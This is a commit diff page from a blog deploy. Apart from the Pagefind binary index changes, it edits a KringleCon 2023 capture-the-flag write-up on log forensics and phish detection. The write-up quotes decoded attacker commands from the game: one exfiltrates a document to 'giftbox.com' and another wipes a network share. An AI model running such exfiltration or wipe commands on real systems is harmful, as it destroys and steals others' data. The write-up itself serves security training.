h/blog
1
Fork 0
mirror of https://github.com/lavafroth/lavafroth.github.io.git synced 2026-06-05 16:21:16 -03:00
Code Issues Packages Projects Releases Wiki Activity

deploy: 113370050a

Browse Source
This commit is contained in:
lavafroth
2025-11-14 04:49:23 +00:00
parent 4e7d598832
commit dfa0093d40
16 changed files with 4 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
pagefind/fragment/en-us_3f5b2db.pf_fragment → pagefind/fragment/en-us_e38046e.pf_fragment
View File

Binary file not shown.

BIN
pagefind/index/en-us_e5ddd69.pf_index → pagefind/index/en-us_0adde87.pf_index
View File

Binary file not shown.

BIN
pagefind/index/en-us_2856191.pf_index Normal file
View File

Binary file not shown.

BIN
pagefind/index/en-us_2e1440e.pf_index
View File

Binary file not shown.

BIN
pagefind/index/en-us_48f05fe.pf_index
View File

Binary file not shown.

BIN
pagefind/index/en-us_6bd9e45.pf_index
View File

Binary file not shown.

BIN
pagefind/index/en-us_83d88d5.pf_index Normal file
View File

Binary file not shown.

BIN
pagefind/index/en-us_8c97b77.pf_index Normal file
View File

Binary file not shown.

BIN
pagefind/index/en-us_982e17a.pf_index Normal file
View File

Binary file not shown.

BIN
pagefind/index/en-us_ba6833d.pf_index
View File

Binary file not shown.

BIN
pagefind/index/en-us_c41d634.pf_index
View File

Binary file not shown.

BIN
pagefind/index/en-us_d8bd351.pf_index Normal file
View File

Binary file not shown.

2
pagefind/pagefind-entry.json
View File

@@ -1 +1 @@
{"version":"1.0.3","languages":{"en-us":{"hash":"en-us_84d7c28ab35c2","wasm":"en-us","page_count":59}}}
{"version":"1.0.3","languages":{"en-us":{"hash":"en-us_cba0324d8ddbf","wasm":"en-us","page_count":59}}}

BIN
pagefind/pagefind.en-us_84d7c28ab35c2.pf_meta
View File

Binary file not shown.

BIN
pagefind/pagefind.en-us_cba0324d8ddbf.pf_meta Normal file
View File

Binary file not shown.

6
post/kringlecon-2023-writeup/index.html
View File

@@ -1094,10 +1094,10 @@ these are then rearranged in reverse and the trailing <code>-join ''</code> join
</span></span><span style=display:flex><span>print(<span style=color:#e6db74>&#39;&#39;</span><span style=color:#f92672>.</span>join(map(chr, encoded)))
</span></span></code></pre></div><p>This yields the following decoded version of the command:</p><pre tabindex=0><code>downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file
</code></pre><p>Here we notice the attacker using an executable called <code>downwithsanta.exe</code> with the <code>-exfil</code> flag to probably exfiltrate the <code>NaughtyNiceList.docx</code> to <code>giftbox.com</code>.</p><p>Answer: <code>giftbox.com</code></p><h4 id=the-final-step>The final step!</h4><blockquote><p>Wow! You decoded those secret messages with easy! You&rsquo;re a rockstar. It seems like we&rsquo;re getting near the end of this investigation, but we need your help with one more thing&mldr;</p></blockquote><blockquote><p>We know that the attackers stole Santa&rsquo;s naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?</p></blockquote><ol><li>What is the name of the executable the attackers used in the final malicious command?</li></ol><p>Let&rsquo;s decode the final powershell encoded command. As an aside, this coincides to be the last command the attacker ran if we removed the <code>-enc</code> filter.</p><p><img src alt="evidence that it was the last command"></p><p><img src alt></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>echo QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ<span style=color:#f92672>=</span> | base64 -d
</span></span></code></pre></div><p>This decodes to the following powershell command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>C:<span style=color:#ae81ff>\W</span>indows<span style=color:#ae81ff>\S</span>ystem32<span style=color:#ae81ff>\d</span>ownwithsanta.exe --wipeall <span style=color:#ae81ff>\\\\</span>NorthPolefileshare<span style=color:#ae81ff>\\</span>c$
</span></span></code></pre></div><p>This decodes to the following powershell command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-powershell data-lang=powershell><span style=display:flex><span>C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
</span></span></code></pre></div><p>This shows the attacker running the <code>downwithsanta.exe</code> executable.</p><p>Answer: <code>downwithsanta.exe</code></p><ol start=2><li>What was the command line flag used alongside this executable?</li></ol><p>In the previous decoded command we also noted that the attacker used the <code>--wipeall</code> with the executable.</p><p>Answer: <code>--wipeall</code></p><h4 id=the-flag>The flag</h4><p>After submitting all the answers, we are asked to complete our objective in HHC by submitting the output of the following command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-py data-lang=py><span style=display:flex><span>print base64_decode_tostring(<span style=color:#e6db74>&#39;QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==&#39;</span>)
</span></span></code></pre></div><p>This decodes to <code>Beware the Cube that Wombles</code>. We submit this in our objectives tab and mark this complete.</p><h1 id=film-noir-island-the-blacklight-district>Film Noir Island: The Blacklight District</h1><h2 id=phish-detection>Phish Detection</h2><p><img src=../../kringlecon/2023/phish.avif alt="Intro to the phish detection challenge"></p><blockquote><p>Attention, Digital Defenders! You&rsquo;ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It&rsquo;s been reported that AI has started hallucinating, and it&rsquo;s up to you to discern the reality behind these emails.</p></blockquote><blockquote><p>Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren&rsquo;s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.</p></blockquote><blockquote><p>Collaboration with ChatNPT: In our ongoing battle against phishing, we&rsquo;ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn&rsquo;t foolproof! It&rsquo;s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!</p></blockquote><blockquote><p>Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.</p></blockquote><p><img src=../../kringlecon/2023/phish-00.avif alt></p><p>Welcome to the Geese Islands Email Security Overview. This page serves as a guide to understanding the key components of email authentication and security for our domain. Below, you will find detailed information about our SPF, DKIM, and DMARC records the three pillars that fortify our email communications against phishing and spoofing attacks. Each section provides insights into what these records are, their importance in maintaining email integrity, and how they are configured for the utmost security of our digital correspondence.</p><ul><li>SPF Record: Ensures emails are sent from authorized servers.</li></ul><table><thead><tr><th>Domain</th><th>Type</th><th>Value</th></tr></thead><tbody><tr><td>geeseislands.com</td><td>TXT</td><td>v=spf1 a:mail.geeseislands.com -all</td></tr></tbody></table><ul><li>DKIM Record: Verifies that the email message is not forged.</li></ul><table><thead><tr><th>Domain</th><th>Type</th><th>Value</th></tr></thead><tbody><tr><td>geeseislands.com</td><td>TXT</td><td>v=DKIM1;t=s;p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDjtqsLqwecFGF7AmP+Siln86O1v9NOKJw4ZsEHDV5fo0Vjj0qNPyyARKSkDmnIKjnzLGUUQO31Fr+vdZU61IaI9/ZD39WJKaAeX96uQ65mRQqqPVYxPLN5OvuFRmIHJ/TgOkD6z5/7VM7Zs1kw5Qnl04FmOLwWd00D+uNZnj8TCwIDAQAB</td></tr></tbody></table><ul><li>DMARC Record: Specifies how an email receiver should handle emails that fail SPF and DKIM checks.</li></ul><table><thead><tr><th>Domain</th><th>Type</th><th>Value</th></tr></thead><tbody><tr><td>geeseislands.com</td><td>TXT</td><td>v=DMARC1; p=reject; pct=100; rua=mailto:dmarc-reports@geeseislands.com</td></tr></tbody></table><p><img src=../../kringlecon/2023/phish-01.avif alt></p><p>For any of the emails having the DKIM domain (<code>d</code>) parameter <code>mail.geeseislands.com</code>, DMARC as <code>Pass</code> and optionally SPF as <code>pass</code>,
we mark them safe. If the values differ or the domain is entirely different, we mark it as phishing.</p><p>These were all the challenges that I could solve before other matters took precedence. I hope you learned something or at the very least, were amused by my less elegant way of solving things.</p><p>Bye now.</p></section><footer class=post-tags data-pagefind-meta=tags><a href=https://lavafroth.is-a.dev/tags/binary-exploitation class=list-tag>Binary Exploitation</a>
</span></span></code></pre></div><p>This decodes to <code>Beware the Cube that Wombles</code>. We submit this in our objectives tab and mark this complete.</p><h1 id=film-noir-island-the-blacklight-district>Film Noir Island: The Blacklight District</h1><h2 id=phish-detection>Phish Detection</h2><p><img src=../../kringlecon/2023/phish.avif alt="Intro to the phish detection challenge"></p><blockquote><p>Attention, Digital Defenders! You&rsquo;ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It&rsquo;s been reported that AI has started hallucinating, and it&rsquo;s up to you to discern the reality behind these emails.</p></blockquote><blockquote><p>Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren&rsquo;s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.</p></blockquote><blockquote><p>Collaboration with ChatNPT: In our ongoing battle against phishing, we&rsquo;ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn&rsquo;t foolproof! It&rsquo;s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!</p></blockquote><blockquote><p>Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.</p></blockquote><p><img src=../../kringlecon/2023/phish-00.avif alt></p><p>Welcome to the Geese Islands Email Security Overview. This page serves as a guide to understanding the key components of email authentication and security for our domain. Below, you will find detailed information about our SPF, DKIM, and DMARC records the three pillars that fortify our email communications against phishing and spoofing attacks. Each section provides insights into what these records are, their importance in maintaining email integrity, and how they are configured for the utmost security of our digital correspondence.</p><ul><li>SPF Record: Ensures emails are sent from authorized servers.<ul><li>Domain: geeseislands.com</li><li>Type: TXT</li><li>Value: v=spf1 a:mail.geeseislands.com -all</li></ul></li><li>DKIM Record: Verifies that the email message is not forged.<ul><li>Domain: geeseislands.com</li><li>Type: TXT</li><li>Value: v=DKIM1;t=s;p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDjtqsLqwecFGF7AmP+Siln86O1v9NOKJw4ZsEHDV5fo0Vjj0qNPyyARKSkDmnIKjnzLGUUQO31Fr+vdZU61IaI9/ZD39WJKaAeX96uQ65mRQqqPVYxPLN5OvuFRmIHJ/TgOkD6z5/7VM7Zs1kw5Qnl04FmOLwWd00D+uNZnj8TCwIDAQAB</li></ul></li><li>DMARC Record: Specifies how an email receiver should handle emails that fail SPF and DKIM checks.<ul><li>Domain: geeseislands.com</li><li>Type: TXT</li><li>Value: v=DMARC1; p=reject; pct=100; rua=mailto:dmarc-reports@geeseislands.com</li></ul></li></ul><p><img src=../../kringlecon/2023/phish-01.avif alt></p><p>For any of the emails having the DKIM domain (<code>d</code>) parameter <code>mail.geeseislands.com</code>, DMARC as <code>Pass</code> and optionally SPF as <code>pass</code>,
we mark them safe. If the values differ or the domain is entirely different, we mark it as phishing.</p><p>These were all the challenges that I could solve before other matters took precedence. I hope you learned something or at the very least, were amused by my crude way of solving things.</p><p>Bye now.</p></section><footer class=post-tags data-pagefind-meta=tags><a href=https://lavafroth.is-a.dev/tags/binary-exploitation class=list-tag>Binary Exploitation</a>
<a href=https://lavafroth.is-a.dev/tags/ci-exploitation class=list-tag>CI Exploitation</a>
<a href=https://lavafroth.is-a.dev/tags/cloud-security class=list-tag>Cloud Security</a>
<a href=https://lavafroth.is-a.dev/tags/cryptography class=list-tag>Cryptography</a>